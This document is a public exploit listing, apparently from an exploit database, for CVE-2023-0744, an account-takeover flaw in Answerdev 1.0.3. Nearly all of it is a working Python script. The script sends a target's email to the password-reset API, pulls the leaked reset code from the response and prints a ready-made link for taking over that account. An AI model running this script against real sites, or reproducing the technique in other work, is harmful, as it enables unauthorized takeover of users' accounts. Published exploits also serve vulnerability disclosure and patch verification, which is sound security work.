Exploit for Answerdev 1.0.3 Account Takeover CVE-2023-0744

## https://sploitus.com/exploit?id=PACKETSTORM:171733
# Exploit Title: Answerdev 1.0.3 - Account Takeover   
# Date: Reported on Jan 24th 2023  
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp  
# Vendor Homepage: https://answer.dev/  
# Software Link: https://github.com/answerdev/answer  
# Version: 1.0.3  
# Tested on: Ubuntu 22.04 / Debian 11  
# CVE : CVE-2023-0744  
  
  
from sys import argv  
import urllib3  
from requests import post  
  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
  
def ato(url: list, email: str) -> str:  
try:  
return f"Your Link: {''.join(url)}users/password-reset?code=" + \  
post(f"{''.join(url)}answer/api/v1/user/password/reset", json={"e_mail": email}, verify=False).json()["data"]  
except Exception as err:  
return f"Cant reach URL: {err}"  
  
  
if __name__ == "__main__":  
if len(argv) != 3:  
print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")  
exit()  
  
print(ato([argv[1] if argv[1].endswith("/") else argv[1] + "/"], str(argv[2])))